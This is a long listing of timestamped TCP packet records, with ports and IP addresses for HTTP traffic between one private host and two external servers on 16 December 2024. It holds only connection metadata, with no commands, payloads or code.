Dec 16, 2024 11:03:31.236195087 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.353998899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.354055882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.354146957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.354327917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.354382038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.354530096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.354578972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.354588985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.354631901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.355804920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.355842113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.355860949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.355879068 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.355885029 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.355911016 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.355958939 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.355989933 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.356031895 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.356117964 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.356170893 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.356193066 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.356201887 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.356237888 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.356662035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.356700897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.356714010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.356754065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.357748985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.357846022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.357856989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.357902050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.358834028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.358890057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.358944893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.359934092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.359987020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.360057116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.360104084 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.361006975 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.361056089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.361109018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.361152887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.362149000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.362260103 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.362315893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.363251925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.363337040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.363387108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.363440990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.364300966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.364355087 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.364478111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.364525080 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.365452051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.365552902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.365602970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.366415024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.366470098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.366555929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.366601944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.367568016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.367624044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.367655039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.367700100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.368599892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.368649006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.368738890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.368788004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.369684935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.369745970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.369806051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.369857073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.371279001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.371337891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.371391058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.371853113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.371906996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.371989965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.372039080 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.372931004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.372988939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.373049021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.373092890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.374031067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.374136925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.374195099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.375080109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.375133991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.375168085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.375219107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.376199961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.376252890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.376313925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.376355886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.377299070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.377428055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.377475977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.378346920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.378405094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.378469944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.378515959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.379430056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.379484892 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.379555941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.379601002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.380508900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.380556107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.380611897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.380657911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.381583929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.381639004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.381705999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.381756067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.382664919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.382710934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.382777929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.383766890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.383816957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.383889914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.383938074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.384862900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.384912014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.384985924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.385035038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.385956049 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.386013985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.386065006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.387042046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.387092113 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.387135029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.387181997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.388139963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.388187885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.388199091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.388243914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.389215946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.389276028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.389328957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.390250921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.390321016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.390371084 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.391408920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.391463995 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.391590118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.391640902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.392481089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.392529964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.392556906 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.392606020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.393549919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.393599987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.393665075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.393717051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.394625902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.394675016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.394788980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.395699024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.395745039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.395754099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.395801067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.396771908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.396822929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.396878004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.396924973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.397847891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.397960901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.398006916 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.398375034 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.398499012 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.398901939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.399022102 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.399070978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.400012970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.400065899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.400127888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.400192976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.401108027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.401177883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.401230097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.402173042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.402221918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.402229071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.402275085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.403269053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.403325081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.403398037 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.403445005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.404366970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.404421091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.404458046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.404500008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.405440092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.405486107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.405555964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.405600071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.406495094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.406562090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.406632900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.406676054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.407808065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.407846928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.407901049 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.408724070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.408782005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.408844948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.408895016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.409782887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.409840107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.409889936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.518588066 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.522838116 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.546391964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.546447992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.546487093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.546524048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.546565056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.546658039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.546787024 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.546808004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.546855927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.547837973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.547903061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.547965050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.548012972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.548814058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.548862934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.548952103 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.549001932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.549899101 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.550066948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.550138950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.550998926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.551058054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.551100969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.551153898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.552059889 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.552198887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.552252054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.553145885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.553277016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.553329945 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.554222107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.554277897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.554346085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.554395914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.555289984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.555341959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.555378914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.555432081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.556529999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.556618929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.556674957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.557487965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.557538033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.557543993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.557590008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.558412075 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.558612108 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.558613062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.558650970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.558664083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.558697939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.559696913 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.559834957 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.559886932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.560751915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.560802937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.560869932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.560920000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.561816931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.561956882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.562009096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.562907934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.562963963 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.563033104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.563081026 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.563987970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.564033985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.564143896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.564193010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.565104008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.565218925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.565268993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.566591978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.566734076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.566788912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.567245007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.567293882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.567378998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.567439079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.568344116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.568392038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.568459034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.568509102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.569420099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.569468975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.569550991 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.569875002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.570491076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.570544004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.570611000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.570708036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.571594000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.571650982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.571696997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.571932077 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.572663069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.572725058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.572777987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.573213100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.573749065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.573874950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.573916912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.574829102 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.574876070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.574942112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.574982882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.575928926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.575974941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.576041937 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.576086998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.576987028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.577043056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.577090025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.578109026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.578258038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.578298092 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.578298092 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.579163074 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.579221964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.579288006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.579473019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.580245972 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.580317020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.580435038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.580738068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.581417084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.581585884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.581639051 CET	49833	80	192.168.2.5	31.41.244.11
